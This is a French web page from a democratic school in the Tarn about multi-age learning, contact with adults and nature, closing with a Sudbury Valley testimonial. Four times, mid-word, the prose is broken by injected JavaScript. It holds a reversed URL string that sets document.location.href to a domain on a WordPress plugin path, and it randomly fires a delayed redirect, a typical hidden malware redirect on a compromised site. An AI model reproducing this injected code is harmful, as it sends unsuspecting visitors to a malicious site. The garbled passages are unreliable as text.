Des interactions multiples et fécondes

L’école démocratique du Tarn permet à ses membres d’interagir librement. Ainsi, des enfants et des adultes de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout âge échangent à propos de sujets innombrables et développent naturellement leurs compétences relationnelles.

Le multi-âge est une des clés de voûte de l’école. La séparation par classe d’âge génère des niveaux de compétition qui ne sont pas naturels et freine le développement des compétences sociales coopératives. Un accès facilité à des enfants plus jeunes et plus âgés permet la formation spontanée de relations d’accompagnement qui contribuent au développement de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous. Au sein de groupes d’âges variés, les jeunes enfants sont encouragés, et peuvent pratiquer des activités qu’ils ne pourraient pas réaliser seuls ni en compagnie exclusive d’enfants de leur âge, du fait de la complexité, de la difficulté ou du caractère dangereux de celles-ci. Les petits apprennent en observant des activités élaborées, en discutant, et suscitent la créativité des plus grands ; ceux-ci apprennent à prendre soin d’autrui, à être responsable, expérimentent le rôle de la personne la plus mûre dans une relation et approfondissent la compréhension de certaines notions en les expliquant aux plus jeunes. La richesse des interactions intergénérationnelles permet la découverte de nombreux domaines de connaissance.

L’accès à des adultes bienveillants à qui on peut poser toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes sortes de questions, qu’on peut observer, aider, est également un support d’apprentissage très riche pour les enfants. Pour se construire en tant qu’adulte, il faut côtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toyer des adultes !

En plus des personnes physiques, L’école démocratique du Tarn donne accès à de multiples ressources pour que chacun-e puisse trouver de quoi s’épanouir et vive sa scolarité de la façon la plus agréable possible. L’école est implantée sur un site naturel, qui a l’avantage d’offrir aux enfants un contact privilégié avec le monde du vivant. La nature est un environnement riche en découvertes, particulièrement adapté au jeu libre. Son contact est source de multiples apprentissages et favorise le bien-être physique et psychologique.

Témoignages

« Une des choses que la plupart des adultes remarquent en premier à Sudbury Valley est la facilité de communication. Les gens, peu importe leur âge, se traitent avec un respect naturel. Il y a une atmosphère de confiance en soi, la confiance typique d’individus poursuivant des buts qu’ils ont choisis eux-mêmes. Il n’y a presque jamais de calme, et l’atmosphère est électrique et pleine d’enthousiasme, mais non pas chaotique ou frénétique. Les visiteurs disent qu’ils sentent un certain ordre, bien que ce soit clairement un lieu empli d’une intense activité.

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